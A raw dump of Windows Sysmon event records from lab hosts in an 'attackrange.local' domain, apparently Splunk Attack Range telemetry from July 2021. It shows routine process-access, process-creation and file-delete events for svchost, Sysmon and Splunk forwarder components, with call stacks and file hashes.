07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.275{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F622-60EB-A079-00000000D001}2164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.275{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F622-60EB-A079-00000000D001}2164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.275{0C1E0330-F622-60EB-A079-00000000D001}2164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.978{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A4FCA7801E592E70C23709F41C44928,SHA256=DBC33308BE87A9E441F4BDB4FA47CA155BD3DF059A7141E32D1125E795604715,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000808721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.821{0C1E0330-F623-60EB-A279-00000000D001}1960216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F623-60EB-A279-00000000D001}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F623-60EB-A279-00000000D001}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F623-60EB-A279-00000000D001}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.650{0C1E0330-F623-60EB-A279-00000000D001}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.603{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31A6A5F481122834A7689435CF510FAB,SHA256=EFAB0E9820F208718175DF27587B057EA6816EBF2E2037190D03284AE04B1ADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:27.179{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D0E101FB8A97E5BC9DC3A03AD01D539,SHA256=B09F2AC5D933EE260E9BBB9031A843598F190C8C79845C002DBDF1719CAD1A8D,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000808706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.150{0C1E0330-F622-60EB-A179-00000000D001}3952640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000808737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.634{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FFB128CA9FAD56A8E0E0944B31C71E7,SHA256=36254037B8FCFFB5E72F1FC470C181ECCD2FE2EA2AA6A32E53F8266403C061FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:28.194{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF8D5B36E28FAED4CB1E622C5FE2DB45,SHA256=242D5932AE92CA3929B246C622E4942E77664E5C732FD3BEEAA045A2E0E10435,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:28.493{0C1E0330-F624-60EB-A379-00000000D001}1640712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F624-60EB-A379-00000000D001}1640C:\Program 